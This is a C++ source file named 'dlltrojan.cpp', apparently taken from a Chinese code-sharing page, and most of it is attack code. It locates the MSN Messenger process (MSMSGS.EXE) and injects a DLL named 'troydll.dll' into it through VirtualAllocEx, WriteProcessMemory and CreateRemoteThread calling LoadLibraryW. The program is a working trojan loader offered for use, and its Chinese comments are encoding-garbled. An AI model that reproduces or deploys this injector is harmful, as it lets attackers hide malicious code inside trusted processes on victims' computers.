?? dlltrojan.cpp
字號:
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <Tlhelp32.h>
void CheckError ( int, int, char *); //出錯處理函數(shù)
HANDLE hRemoteThread, hRemoteProcess; // 遠程線程和進程句柄
PWSTR pszLibFileRemote=NULL; // 遠程文件名
// 根據(jù)進程名獲取進程ID
DWORD GetProcessIdFromName(char *processname)
{
HANDLE hProcessSnap = NULL;
BOOL bRet = FALSE;
PROCESSENTRY32 pe32 = {0};
DWORD processID; // 進程ID
// 獲得全部進程信息
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE)
{
return FALSE;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
// 從第一個進程開始遍歷所有進程
if (Process32First(hProcessSnap, &pe32))
{
HANDLE hProcess;
// 開始循環(huán)查找進程
while (Process32Next(hProcessSnap, &pe32))
{
// 找到符合進程名稱的進程
if (!strcmp(pe32.szExeFile,processname))
{
// 打開進程
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);
CloseHandle(hProcess);
// 獲得進程ID
processID = pe32.th32ProcessID;
break;
}
}
}
CloseHandle (hProcessSnap);
return processID;
}
void main(int argc,char **argv)
{
int iReturnCode;
char lpDllFullPathName[MAX_PATH];
WCHAR pszLibFileName[MAX_PATH]={0};
// 獲取進程名為MSMSGS.EXE的進程ID
DWORD dwRemoteProcessId = GetProcessIdFromName("MSMSGS.EXE");
strcpy(lpDllFullPathName, "d:\\troydll.dll");
//將DLL文件全路徑的ANSI碼轉(zhuǎn)換成UNICODE碼
iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,
lpDllFullPathName, strlen(lpDllFullPathName),
pszLibFileName, MAX_PATH);
CheckError(iReturnCode, 0, "MultByteToWideChar");
//打開遠程進程
hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允許創(chuàng)建線程
PROCESS_VM_OPERATION | //允許VM操作
PROCESS_VM_WRITE, //允許VM寫
FALSE, dwRemoteProcessId );
CheckError( (int) hRemoteProcess, NULL, "Remote Process not Exist or Access Denied!");
//計算DLL路徑名需要的內(nèi)存空間
int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);
pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess,
NULL,
cb,
MEM_COMMIT,
PAGE_READWRITE);
CheckError((int)pszLibFileRemote, NULL, "VirtualAllocEx");
//將DLL的路徑名復制到遠程進程的內(nèi)存空間
iReturnCode = WriteProcessMemory(hRemoteProcess,
pszLibFileRemote,
(PVOID) pszLibFileName,
cb,
NULL);
CheckError(iReturnCode, false, "WriteProcessMemory");
//計算LoadLibraryW的入口地址
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
CheckError((int)pfnStartAddr, NULL, "GetProcAddress");
//啟動遠程線程,通過遠程線程調(diào)用用戶的DLL文件
hRemoteThread = CreateRemoteThread( hRemoteProcess,
NULL,
0,
pfnStartAddr,
pszLibFileRemote,
0, NULL);
CheckError((int)hRemoteThread, NULL, "Create Remote Thread");
//等待遠程線程退出
WaitForSingleObject(hRemoteThread, INFINITE);
//清場處理
if (pszLibFileRemote != NULL)
{
VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
}
if (hRemoteThread != NULL)
{
CloseHandle(hRemoteThread );
}
if (hRemoteProcess!= NULL)
{
CloseHandle(hRemoteProcess);
}
}
//錯誤處理函數(shù)CheckError()
void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)
{
if(iReturnCode==iErrorCode)
{
printf("%s Error:%d\n\n", pErrorMsg, GetLastError());
//清場處理
if (pszLibFileRemote != NULL)
{
VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
}
if (hRemoteThread != NULL)
{
CloseHandle(hRemoteThread );
}
if (hRemoteProcess!= NULL)
{
CloseHandle(hRemoteProcess);
}
exit(0);
}
}
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -